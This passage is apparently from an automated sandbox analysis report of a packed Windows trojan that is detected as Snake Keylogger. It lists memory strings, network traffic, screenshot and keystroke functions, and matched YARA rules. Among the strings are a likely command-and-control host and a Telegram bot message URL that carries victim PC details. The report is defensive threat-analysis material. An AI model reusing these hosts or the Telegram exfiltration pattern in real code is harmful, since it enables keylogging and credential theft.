                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1379596855.00000000024C2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003388000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003379000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000033BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003383000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003242000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.000000000326D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.000000000326D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000033BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000033B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49723 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 0_2_06CA5D080_2_06CA5D08
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 0_2_06CA08480_2_06CA0848
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_0169C1475_2_0169C147
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_016953625_2_01695362
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_0169D2785_2_0169D278
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_0169C46F5_2_0169C46F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_0169C7385_2_0169C738
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_016969A05_2_016969A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_0169E9885_2_0169E988
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_0169CA085_2_0169CA08
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_01699DE05_2_01699DE0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_0169CCD85_2_0169CCD8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_01696FC85_2_01696FC8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_0169CFAA5_2_0169CFAA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_01693E095_2_01693E09
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_0169F6315_2_0169F631
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_0169E97A5_2_0169E97A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_016929EC5_2_016929EC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_01693AA15_2_01693AA1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_0169FA885_2_0169FA88
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB1E805_2_06DB1E80
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB17A05_2_06DB17A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB9C705_2_06DB9C70
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB95485_2_06DB9548
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB8BA05_2_06DB8BA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB0B305_2_06DB0B30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB50285_2_06DB5028
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB29685_2_06DB2968
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBE6B05_2_06DBE6B0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBE6AF5_2_06DBE6AF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBE6A05_2_06DBE6A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB1E705_2_06DB1E70
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBDE005_2_06DBDE00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB178F5_2_06DB178F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBEF515_2_06DBEF51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBEF605_2_06DBEF60
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBCCA05_2_06DBCCA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBFC5F5_2_06DBFC5F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBFC685_2_06DBFC68
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB9C6D5_2_06DB9C6D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBDDFF5_2_06DBDDFF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBDDF15_2_06DBDDF1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBD5505_2_06DBD550
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBD5405_2_06DBD540
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBEAF85_2_06DBEAF8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBE2585_2_06DBE258
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBE2495_2_06DBE249
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB8B905_2_06DB8B90
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBF3B85_2_06DBF3B8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBEB085_2_06DBEB08
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB93285_2_06DB9328
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB0B205_2_06DB0B20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBD0F85_2_06DBD0F8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB00405_2_06DB0040
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB50185_2_06DB5018
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBF8105_2_06DBF810
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBF8015_2_06DBF801
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB00075_2_06DB0007
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBD9995_2_06DBD999
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DBD9A85_2_06DBD9A8
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000000.1368461461.00000000001DC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVZLk.exe6 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1394403952.00000000093A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1379596855.00000000024C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1378332378.00000000005FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849294560.0000000001187000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeBinary or memory string: OriginalFilenameVZLk.exe6 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
